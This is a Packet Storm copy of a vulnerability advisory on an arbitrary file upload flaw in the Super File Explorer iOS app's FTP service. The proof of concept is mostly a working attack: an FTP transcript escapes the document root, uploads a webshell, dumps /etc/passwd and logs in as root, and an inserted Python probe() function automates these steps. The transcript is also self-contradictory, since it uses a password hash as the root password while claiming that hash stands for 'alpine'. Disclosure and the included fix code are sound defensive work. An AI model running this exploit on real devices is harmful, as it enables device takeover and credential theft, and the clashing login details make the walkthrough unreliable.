Super File Explorer 1.0.1 Arbitrary File Upload

2017-05-03T00:00:00
ID PACKETSTORM:142375
Type packetstorm
Reporter Benjamin Kunz Mejri
Modified 2017-05-03T00:00:00

Description

                                        
Document Title:  
===============  
Super File Explorer 1.0.1 - Arbitrary File Upload Vulnerability  
  
  
References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2034  
  
  
Release Date:  
=============  
2017-02-23  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
2034  
  
  
Common Vulnerability Scoring System:  
====================================  
7  
  
  
Product & Service Introduction:  
===============================  
This app is a file manager and viewer for iPhone, iPod touch, and iPad. Copy, paste, rename, and move files. Integrates with   
AttachmentSaver and Safari Download Manager. Dynamic file sharing folder for iTunes. Manage files in your Dropbox, SugarSync,   
etc. Send files as email attachments. View and download email attachments. Full-screen file viewer.  
  
(Copy of the Homepage: https://itunes.apple.com/de/app/super-file-explorer-file-viewer-file-manager/id1101973946 )  
  
  
Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a vulnerability in the Super File Explorer v1.0.1 iOS mobile application.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2017-02-23: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
LZX Apps  
Product: Super File Explorer - File Viewer & File Manager (Wifi UI & FTP) 1.0.1  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
High  
  
  
Technical Details & Description:  
================================  
An arbitrary file upload web vulnerability has been discovered in the official Super File Explorer v1.0.1 iOS mobile application.   
The vulnerability allows remote attackers to upload arbitrary files and thereby compromise the file system of the device running the service.  
  
The vulnerability is located in the `Developer` directory, which is not shown in the FTP document root but is reachable from it by   
changing to the parent directory (`/../`). Remote attackers are able to upload malicious files such as webshells to the `Developer`   
directory and, in a next step, use them to read the `/etc/passwd` file of the device behind the FTP service. That file contains the   
password hashes of the root and mobile accounts, which allows the attacker to obtain root access to the FTP service and to compromise   
the service or the mobile device. The permission rights of the `Developer` directory allow an attacker to read the passwd file and   
other sensitive data.  
  
By default no password is set for the FTP or web UI account. An attacker can, for example, connect to the FTP service from a console   
client and upload a local file to the `Developer` directory. The attacker then uses the web UI, which is activated together with the   
FTP service, to execute the uploaded file remotely, downloads the passwd file, and logs in to the service with the root credentials.  
  
The security risk of the vulnerability is estimated as high with a common vulnerability scoring system count of 7.0.   
Exploitation of the web vulnerability requires only a low-privilege FTP login (anonymous with arbitrary credentials is accepted)   
and no user interaction. Successful exploitation of the arbitrary file upload web vulnerability results in application or device compromise.  
  
  
Proof of Concept (PoC):  
=======================  
The arbitrary file upload web vulnerability can be exploited by remote attackers without a privileged application   
user account or user interaction. For security demonstration or to reproduce the vulnerability, follow the information   
and steps below.  
  
  
Manual steps to reproduce the vulnerability ...  
1. Install the vulnerable iOS application on your test device (iPhone)  
2. Start the application  
3. Start the FTP and web server via the remote manager button  
4. Connect to the FTP service with a console client and log in as anonymous with arbitrary credentials  
5. Change to the parent directory and move into the `Developer` path  
6. Upload a webshell from the local system or a remote system over the network  
7. Open the FTP web UI URL (http://localhost) and browse to the `Developer` path  
8. Open the webshell and request the accessible "/etc/passwd" file via GET  
9. Log in to the FTP server again as root:smx7MYTQIi2M  
10. Root access is obtained; the FTP server and the mobile device are compromised via the arbitrary file upload vulnerability  
  
  
FTP WEB UI URL:  
http://localhost  
  
FTP SERVER URL:   
localhost:2121  
  
  
--- PoC Exploitation ---  
C:\Users\Admin>ftp  
ftp> open 192.168.2.241 2121  
Connected to 192.168.2.241.  
220 iosFtp server ready.  
502 Unknown command 'UTF8'  
User (192.168.2.241:(none)): anonymous  
331 Password required for anonymous  
Password: a@b.com  
230 User anonymous logged in.  
ftp> cd ..  
250 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opening ASCII mode data connection for '/bin/ls'.  
total 3  
drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 Documents  
drwxr-xr-x 3 mobile mobile 170 Feb 17 22:05 Library  
drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 tmp  
226 Transfer complete.  
ftp: 199 bytes received in 0.01 seconds 13.27KB/s  
ftp> cd /../  
250 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opening ASCII mode data connection for '/bin/ls'.  
total 13  
---------- 1 (null) (null) 0 (null) Applications  
drwxrwxr-x 1 root admin 68 May 29 23:45 Developer  
---------- 1 (null) (null) 0 (null) Library  
---------- 1 (null) (null) 0 (null) System  
---------- 1 (null) (null) 0 (null) bin  
---------- 1 (null) (null) 0 (null) cores  
---------- 1 (null) (null) 0 (null) dev  
---------- 1 (null) (null) 0 (null) etc  
---------- 1 (null) (null) 0 (null) private  
---------- 1 (null) (null) 0 (null) sbin  
---------- 1 (null) (null) 0 (null) tmp  
---------- 1 (null) (null) 0 (null) usr  
---------- 1 (null) (null) 0 (null) var  
226 Transfer complete.  
ftp> help  
Commands may be abbreviated. Commands are:  
  
!        delete      literal    prompt      send  
?        debug       ls         put         status  
append   dir         mdelete    pwd         trace  
ascii    disconnect  mdir       quit        type  
bell     get         mget       quote       user  
binary   glob        mkdir      recv        verbose  
bye      hash        mls        remotehelp  
cd       help        mput       rename  
close    lcd         open       rmdir  
ftp> mget  
Remote files server/path/files/webshell  
ftp: 734 bytes received in 0.08 seconds 9.41KB/s  
ftp> put  
Local file webshell  
Remote file /Developers/  
-  
Note: Now open the web interface and browse in the FTP web UI to the webshell in the `Developer` path,   
which has user-executable rights in the root path. Open the download module and enter the following   
value: "get /etc/passwd". The passwd file is transferred with the following accounts ...  
-  
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false  
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh  
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh  
daemon:*:1:1:System Services:/var/root:/usr/bin/false  
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false  
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false  
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false  
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false  
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false  
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false  
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false  
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false  
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false  
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false  
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false  
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false  
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false  
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false  
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false  
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false  
-   
The hash `/smx7MYTQIi2M` shown for root and mobile is the DES crypt hash of the long-standing iOS default password `alpine`.   
Now log in as root via the system administrator account and move to the root path of the application to elevate permissions.  
-  
ftp> open 192.168.2.241 2121  
Connected to 192.168.2.241.  
220 iosFtp server ready.  
502 Unknown command 'UTF8'  
User (192.168.2.241:(none)): root  
331 Password required for root  
Password: smx7MYTQIi2M  
230 User root logged in.  
ftp> cd /../  
250 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opening ASCII mode data connection for '/bin/ls'.  
total 13  
drwxrwxr-x 1 root admin 0 (null) Applications  
drwxrwxr-x 1 root admin 68 May 29 23:45 Developer  
drwxrwxr-x 1 root admin 0 (null) Library  
drwxrwxr-x 1 root admin 0 (null) System  
drwxrwxr-x 1 root admin 0 (null) bin  
drwxrwxr-x 1 root admin 0 (null) cores  
drwxrwxr-x 1 root admin 0 (null) dev  
drwxrwxr-x 1 root admin 0 (null) etc  
drwxrwxr-x 1 root admin 0 (null) private  
drwxrwxr-x 1 root admin 0 (null) sbin  
drwxrwxr-x 1 root admin 0 (null) tmp  
drwxrwxr-x 1 root admin 0 (null) usr  
drwxrwxr-x 1 root admin 0 (null) var  
226 Transfer complete.  
ftp: 734 bytes received in 0.08 seconds 9.41KB/s  
ftp> get /etc/passwd  
200 PORT command successful.  
150 Opening BINARY mode data connection for '/etc/passwd'.  
226 Transfer complete.  
ftp: 1323 bytes received in 0.00 seconds 1323000.00KB/s  
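The following Python script is an added example, not code from the advisory, the researcher or the vendor. It automates the audit shown in the transcript above: it parses a UNIX-style LIST response to find directories that a non-owner can write to (the `Developer` entry), flags passwd accounts that still carry the default hash, and wraps both in a live `probe()` that repeats the anonymous login, the `/../` escape, a harmless STOR and the `/etc/passwd` retrieval with `ftplib`. The sample listing and passwd lines are copied from this advisory; the host, port and marker filename used by `probe()` are assumptions.

```python
"""Offline audit of the iosFtp transcript above, plus a live probe helper (added example)."""
import io
import ftplib
import re
from dataclasses import dataclass
from typing import Dict, List

# Hash shown for root and mobile in the passwd dump above; it is the well-known
# DES crypt hash of the historical iOS default password "alpine".
KNOWN_DEFAULT_HASH = "/smx7MYTQIi2M"

# Sample input, copied from the transcript and passwd dump in this advisory.
SAMPLE_LISTING = """total 13
---------- 1 (null) (null) 0 (null) Applications
drwxrwxr-x 1 root admin 68 May 29 23:45 Developer
---------- 1 (null) (null) 0 (null) System
---------- 1 (null) (null) 0 (null) etc
"""
SAMPLE_PASSWD = """nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
"""

PERMS_RE = re.compile(r"[-dl][rwx-]{9}")


@dataclass
class Entry:
    name: str
    perms: str   # e.g. "drwxrwxr-x"
    owner: str
    group: str

    @property
    def is_dir(self) -> bool:
        return self.perms.startswith("d")

    @property
    def writable_beyond_owner(self) -> bool:
        # perms[5] is the group write bit, perms[8] the "other" write bit
        return self.perms[5] == "w" or self.perms[8] == "w"


def parse_listing(listing: str) -> List[Entry]:
    """Parse UNIX-style LIST output; skips 'total N' and malformed lines."""
    entries = []
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) < 5 or not PERMS_RE.fullmatch(parts[0]):
            continue
        entries.append(Entry(name=parts[-1], perms=parts[0], owner=parts[2], group=parts[3]))
    return entries


def writable_dirs(listing: str) -> List[str]:
    """Directories a non-owner may write to: candidate upload targets."""
    return [e.name for e in parse_listing(listing) if e.is_dir and e.writable_beyond_owner]


def accounts_with_default_hash(passwd: str) -> List[str]:
    """Accounts whose password field still carries the default hash."""
    return [f[0] for f in (line.split(":") for line in passwd.splitlines())
            if len(f) >= 2 and f[1] == KNOWN_DEFAULT_HASH]


def probe(host: str, port: int = 2121, marker: str = "upload_probe.txt") -> Dict:
    """Live check against a device under test (assumed host/port; needs network).

    Repeats the transcript: anonymous login with any password, escape the document
    root with "/../", try a harmless STOR into each writable-looking directory,
    then fetch /etc/passwd and flag default hashes.
    """
    report = {"escaped_root": False, "upload_dir": None, "default_hash_accounts": []}
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=10)
    ftp.login("anonymous", "a@b.com")      # the vulnerable build accepts any credentials
    ftp.cwd("/../")
    lines: List[str] = []
    ftp.retrlines("LIST", lines.append)
    root_listing = "\n".join(lines)
    names = {e.name for e in parse_listing(root_listing)}
    report["escaped_root"] = {"System", "usr", "private"} <= names
    for name in writable_dirs(root_listing):
        try:
            ftp.storbinary(f"STOR /../{name}/{marker}", io.BytesIO(b"probe\n"))
            ftp.delete(f"/../{name}/{marker}")   # leave nothing behind
            report["upload_dir"] = name
            break
        except ftplib.error_perm:
            continue
    buf = io.BytesIO()
    try:
        ftp.retrbinary("RETR /etc/passwd", buf.write)
        report["default_hash_accounts"] = accounts_with_default_hash(
            buf.getvalue().decode(errors="replace"))
    except ftplib.error_perm:
        pass
    ftp.quit()
    return report
```

Run `writable_dirs(SAMPLE_LISTING)` and `accounts_with_default_hash(SAMPLE_PASSWD)` offline to see the two findings the transcript relies on; `probe("192.168.2.241")` only makes sense against a test device you own, and it deletes its marker file after the STOR check.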
  
  
Solution - Fix & Patch:  
=======================  
The vulnerability can be resolved by changing the default root credentials, in combination with secure access permissions   
for the web UI and the `Developer` path. Requests that use `/../` to reach the static root path from the FTP document root   
must be rejected unless the user has the required permission.  
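One way to implement the path restriction recommended above, as an added example in Python that is not the vendor's code: every `..` component of a client-supplied path is applied against a virtual root and rejected as soon as it would climb above it, so `/../` can no longer reach the device's real root, and uploads are only accepted into an allow-listed directory. The root path `/var/mobile/Documents` and the allow-list `("/Documents",)` are assumptions for illustration.

```python
"""Confined path handling for an embedded FTP/web file service (added example)."""
import posixpath
from typing import Iterable, List


class PathEscape(Exception):
    """A client-supplied path would leave the document root."""


def virtual_path(cwd: str, requested: str) -> str:
    """Normalise a client path to an absolute virtual path; "/" is the jail root.

    Each ".." is applied component by component and refused the moment it would
    rise above "/", which is exactly the "/../" escape the advisory shows.
    """
    raw = requested if requested.startswith("/") else posixpath.join(cwd, requested)
    stack: List[str] = []
    for part in raw.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:
                raise PathEscape(f"{requested!r} escapes the document root")
            stack.pop()
        else:
            stack.append(part)
    return "/" + "/".join(stack)


def confine(root: str, cwd: str, requested: str) -> str:
    """Map a virtual path onto the real filesystem path below `root` (assumed root)."""
    return posixpath.join(root, virtual_path(cwd, requested).lstrip("/"))


def stor_allowed(cwd: str, requested: str,
                 allowed: Iterable[str] = ("/Documents",)) -> bool:
    """Permit an upload only if its target directory lies inside an allow-listed directory."""
    parent = posixpath.dirname(virtual_path(cwd, requested))
    return any(parent == a or parent.startswith(a.rstrip("/") + "/") for a in allowed)
```

`confine()` is what CWD, RETR and the web UI's download module should call before touching the filesystem; `stor_allowed()` is the extra gate for STOR, so a webshell can never land in `Developer` even if that directory is writable. A real server must additionally resolve symlinks under the root (for example with `os.path.realpath`) before serving a file, which this string-only check does not do.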
  
  
Security Risk:  
==============  
The security risk of the arbitrary file upload vulnerability in the mobile ftp application is estimated as high. (CVSS 7.0)  
  
  
Credits & Authors:  
==================  
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed   
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable   
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab   
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for   
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,   
deface websites, hack into databases or trade with stolen data.  
  
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com  
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact  
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php  
  
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.   
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by   
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark   
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.  
  
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
  